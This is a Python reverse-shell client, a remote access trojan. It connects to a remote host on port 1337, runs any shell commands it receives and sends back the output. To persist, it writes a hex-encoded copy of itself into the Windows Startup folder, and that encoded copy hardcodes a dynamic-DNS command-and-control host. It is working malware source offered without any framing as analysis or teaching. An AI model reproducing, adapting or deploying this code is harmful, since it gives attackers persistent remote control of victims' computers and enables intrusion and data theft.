import os
import socket
import subprocess
import time
import signal
import sys
import struct
import shutil

class Client(object):

    def __init__(self):
        self.serverHost = 'ENTER_HOST'
        self.serverPort = 1337
        self.socket = None

    def register_signal_handler(self):
        signal.signal(signal.SIGINT, self.quit_gracefully)
        signal.signal(signal.SIGTERM, self.quit_gracefully)
        return

    def quit_gracefully(self, signal=None, frame=None):
        if self.socket:
            try:
                self.socket.shutdown(2)
                self.socket.close()
            except Exception as e:
                print('')
        sys.exit(0)
        return

    def socket_create(self):
        try:
            self.socket = socket.socket()
        except socket.error as e:
            print('')
            return
        return

    def socket_connect(self):
        try:
            self.socket.connect((self.serverHost, self.serverPort))
        except socket.error as e:
            print('')
            time.sleep(5)
            raise
        try:
            self.socket.send(str.encode(socket.gethostname()))
        except socket.error as e:
            print('')
            raise
        return

    def print_output(self, output_str):
        sent_message = str.encode(output_str + str(os.getcwd()) + '> ')
        self.socket.send(struct.pack('>I', len(sent_message)) + sent_message)
        return

    def receive_commands(self):
        try:
            self.socket.recv(10)
        except Exception as e:
            print('')
            return
        cwd = str.encode(str(os.getcwd()) + '> ')
        self.socket.send(struct.pack('>I', len(cwd)) + cwd)
        while True:
            output_str = None
            data = self.socket.recv(20480)
            if data == b'': break
            elif data[:2].decode("utf-8") == 'cd':
                directory = data[3:].decode("utf-8")
                try:
                    os.chdir(directory.strip())
                except Exception as e:
                    output_str = "Could not change directory: %s\n" %str(e)
                else: 
                    output_str = ""
            elif data[:].decode("utf-8") == 'quit':
                self.socket.close()
                break
            elif data[:].decode("utf-8") == 'remove':
                user = os.getlogin()
                target = "C:/Users/%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/python.pyw"%user
                os.remove(target)
                exit()
                break
            elif len(data) > 0:
                try:
                    cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    output_bytes = cmd.stdout.read() + cmd.stderr.read()
                    output_str = output_bytes.decode("utf-8", errors="replace")
                except Exception as e:
                    output_str = "Command execution unsuccessful: %s\n" %str(e)
            if output_str is not None:
                try:
                    self.print_output(output_str)
                except Exception as e:
                    print('')
        self.socket.close()
        return

payload = str.encode("""\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x69\x67\x6e\x61\x6c\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x72\x75\x63\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x68\x75\x74\x69\x6c\x0a\x0a\x63\x6c\x61\x73\x73\x20\x43\x6c\x69\x65\x6e\x74\x28\x6f\x62\x6a\x65\x63\x74\x29\x3a\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x5f\x5f\x69\x6e\x69\x74\x5f\x5f\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x65\x72\x76\x65\x72\x48\x6f\x73\x74\x20\x3d\x20\x27\x76\x61\x6e\x74\x61\x78\x79\x7a\x2e\x64\x64\x6e\x73\x2e\x6e\x65\x74\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x65\x72\x76\x65\x72\x50\x6f\x72\x74\x20\x3d\x20\x31\x33\x33\x37\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x20\x3d\x20\x4e\x6f\x6e\x65\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x72\x65\x67\x69\x73\x74\x65\x72\x5f\x73\x69\x67\x6e\x61\x6c\x5f\x68\x61\x6e\x64\x6c\x65\x72\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x69\x67\x6e\x61\x6c\x2e\x73\x69\x67\x6e\x61\x6c\x28\x73\x69\x67\x6e\x61\x6c\x2e\x53\x49\x47\x49\x4e\x54\x2c\x20\x73\x65\x6c\x66\x2e\x71\x75\x69\x74\x5f\x67\x72\x61\x63\x65\x66\x75\x6c\x6c\x79\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x69\x67\x6e\x61\x6c\x2e\x73\x69\x67\x6e\x61\x6c\x28\x73\x69\x67\x6e\x61\x6c\x2e\x53\x49\x47\x54\x45\x52\x4d\x2c\x20\x73\x65\x6c\x66\x2e\x71\x75\x69\x74\x5f\x67\x72\x61\x63\x65\x66\x75\x6c\x6c\x79\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x71\x75\x69\x74\x5f\x67\x72\x61\x63\x65\x66\x75\x6c\x6c\x79\x28\x73\x65\x6c\x66\x2c\x20\x73\x69\x67\x6e\x61\x6c\x3d\x4e\x6f\x6e\x65\x2c\x20\x66\x72\x61\x6d\x65\x3d\x4e\x6f\x6e\x65\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x73\x68\x75\x74\x64\x6f\x77\x6e\x28\x32\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x20\x63\x6f\x6e\x74\x69\x6e\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x2e\x65\x78\x69\x74\x28\x30\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x73\x6f\x63\x6b\x65\x74\x5f\x63\x72\x65\x61\x74\x65\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x22\x22\x22\x20\x43\x72\x65\x61\x74\x65\x20\x61\x20\x73\x6f\x63\x6b\x65\x74\x20\x22\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x20\x3d\x20\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x73\x6f\x63\x6b\x65\x74\x2e\x65\x72\x72\x6f\x72\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x73\x6f\x63\x6b\x65\x74\x5f\x63\x6f\x6e\x6e\x65\x63\x74\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x22\x22\x22\x20\x43\x6f\x6e\x6e\x65\x63\x74\x20\x74\x6f\x20\x61\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x6f\x63\x6b\x65\x74\x20\x22\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x73\x65\x6c\x66\x2e\x73\x65\x72\x76\x65\x72\x48\x6f\x73\x74\x2c\x20\x73\x65\x6c\x66\x2e\x73\x65\x72\x76\x65\x72\x50\x6f\x72\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x73\x6f\x63\x6b\x65\x74\x2e\x65\x72\x72\x6f\x72\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x28\x35\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x61\x69\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x73\x65\x6e\x64\x28\x73\x74\x72\x2e\x65\x6e\x63\x6f\x64\x65\x28\x73\x6f\x63\x6b\x65\x74\x2e\x67\x65\x74\x68\x6f\x73\x74\x6e\x61\x6d\x65\x28\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x73\x6f\x63\x6b\x65\x74\x2e\x65\x72\x72\x6f\x72\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x61\x69\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x70\x72\x69\x6e\x74\x5f\x6f\x75\x74\x70\x75\x74\x28\x73\x65\x6c\x66\x2c\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x22\x22\x22\x20\x50\x72\x69\x6e\x74\x73\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x6f\x75\x74\x70\x75\x74\x20\x22\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6e\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x20\x3d\x20\x73\x74\x72\x2e\x65\x6e\x63\x6f\x64\x65\x28\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x2b\x20\x73\x74\x72\x28\x6f\x73\x2e\x67\x65\x74\x63\x77\x64\x28\x29\x29\x20\x2b\x20\x27\x3e\x20\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x73\x65\x6e\x64\x28\x73\x74\x72\x75\x63\x74\x2e\x70\x61\x63\x6b\x28\x27\x3e\x49\x27\x2c\x20\x6c\x65\x6e\x28\x73\x65\x6e\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x29\x29\x20\x2b\x20\x73\x65\x6e\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x72\x65\x63\x65\x69\x76\x65\x5f\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x22\x22\x22\x20\x52\x65\x63\x65\x69\x76\x65\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x66\x72\x6f\x6d\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x72\x76\x65\x72\x20\x61\x6e\x64\x20\x72\x75\x6e\x20\x6f\x6e\x20\x6c\x6f\x63\x61\x6c\x20\x6d\x61\x63\x68\x69\x6e\x65\x20\x22\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x72\x65\x63\x76\x28\x31\x30\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x77\x64\x20\x3d\x20\x73\x74\x72\x2e\x65\x6e\x63\x6f\x64\x65\x28\x73\x74\x72\x28\x6f\x73\x2e\x67\x65\x74\x63\x77\x64\x28\x29\x29\x20\x2b\x20\x27\x3e\x20\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x73\x65\x6e\x64\x28\x73\x74\x72\x75\x63\x74\x2e\x70\x61\x63\x6b\x28\x27\x3e\x49\x27\x2c\x20\x6c\x65\x6e\x28\x63\x77\x64\x29\x29\x20\x2b\x20\x63\x77\x64\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x54\x72\x75\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x3d\x20\x4e\x6f\x6e\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x72\x65\x63\x76\x28\x32\x30\x34\x38\x30\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x61\x74\x61\x20\x3d\x3d\x20\x62\x27\x27\x3a\x20\x62\x72\x65\x61\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x64\x61\x74\x61\x5b\x3a\x32\x5d\x2e\x64\x65\x63\x6f\x64\x65\x28\x22\x75\x74\x66\x2d\x38\x22\x29\x20\x3d\x3d\x20\x27\x63\x64\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x20\x3d\x20\x64\x61\x74\x61\x5b\x33\x3a\x5d\x2e\x64\x65\x63\x6f\x64\x65\x28\x22\x75\x74\x66\x2d\x38\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x2e\x63\x68\x64\x69\x72\x28\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x2e\x73\x74\x72\x69\x70\x28\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x3d\x20\x22\x43\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x63\x68\x61\x6e\x67\x65\x20\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x3a\x20\x25\x73\x5c\x6e\x22\x20\x25\x73\x74\x72\x28\x65\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x3d\x20\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x64\x61\x74\x61\x5b\x3a\x5d\x2e\x64\x65\x63\x6f\x64\x65\x28\x22\x75\x74\x66\x2d\x38\x22\x29\x20\x3d\x3d\x20\x27\x71\x75\x69\x74\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x72\x65\x61\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x65\x6e\x28\x64\x61\x74\x61\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6d\x64\x20\x3d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x6f\x70\x65\x6e\x28\x64\x61\x74\x61\x5b\x3a\x5d\x2e\x64\x65\x63\x6f\x64\x65\x28\x22\x75\x74\x66\x2d\x38\x22\x29\x2c\x20\x73\x68\x65\x6c\x6c\x3d\x54\x72\x75\x65\x2c\x20\x73\x74\x64\x6f\x75\x74\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x64\x65\x72\x72\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x2c\x20\x73\x74\x64\x69\x6e\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x79\x74\x65\x73\x20\x3d\x20\x63\x6d\x64\x2e\x73\x74\x64\x6f\x75\x74\x2e\x72\x65\x61\x64\x28\x29\x20\x2b\x20\x63\x6d\x64\x2e\x73\x74\x64\x65\x72\x72\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x3d\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x79\x74\x65\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x22\x75\x74\x66\x2d\x38\x22\x2c\x20\x65\x72\x72\x6f\x72\x73\x3d\x22\x72\x65\x70\x6c\x61\x63\x65\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x20\x54\x4f\x44\x4f\x3a\x20\x45\x72\x72\x6f\x72\x20\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x69\x73\x20\x6c\x6f\x73\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x3d\x20\x22\x43\x6f\x6d\x6d\x61\x6e\x64\x20\x65\x78\x65\x63\x75\x74\x69\x6f\x6e\x20\x75\x6e\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x3a\x20\x25\x73\x5c\x6e\x22\x20\x25\x73\x74\x72\x28\x65\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x20\x69\x73\x20\x6e\x6f\x74\x20\x4e\x6f\x6e\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x70\x72\x69\x6e\x74\x5f\x6f\x75\x74\x70\x75\x74\x28\x6f\x75\x74\x70\x75\x74\x5f\x73\x74\x72\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x28\x29\x3a\x0a\x20\x20\x20\x20\x63\x6c\x69\x65\x6e\x74\x20\x3d\x20\x43\x6c\x69\x65\x6e\x74\x28\x29\x0a\x20\x20\x20\x20\x63\x6c\x69\x65\x6e\x74\x2e\x72\x65\x67\x69\x73\x74\x65\x72\x5f\x73\x69\x67\x6e\x61\x6c\x5f\x68\x61\x6e\x64\x6c\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x5f\x63\x72\x65\x61\x74\x65\x28\x29\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x54\x72\x75\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x5f\x63\x6f\x6e\x6e\x65\x63\x74\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x28\x35\x29\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x72\x65\x61\x6b\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\x69\x65\x6e\x74\x2e\x72\x65\x63\x65\x69\x76\x65\x5f\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x61\x73\x20\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x27\x29\x0a\x20\x20\x20\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x0a\x0a\x0a\x69\x66\x20\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x20\x3d\x3d\x20\x27\x5f\x5f\x6d\x61\x69\x6e\x5f\x5f\x27\x3a\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x54\x72\x75\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x28\x29\x0a""")

def main():
    user = os.getlogin()
    target = "C:/Users/%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/python.pyw"%user
    f = open(target, 'wb')
    f.write(payload)
    f.close()
    client = Client()
    client.register_signal_handler()
    client.socket_create()
    while True:
        try:
            client.socket_connect()
        except Exception as e:
            time.sleep(5)     
        else:
            break    
    try:
        client.receive_commands()
    except Exception as e:
        print('')
    client.socket.close()
    return

if __name__ == '__main__':
    while True:
        main()
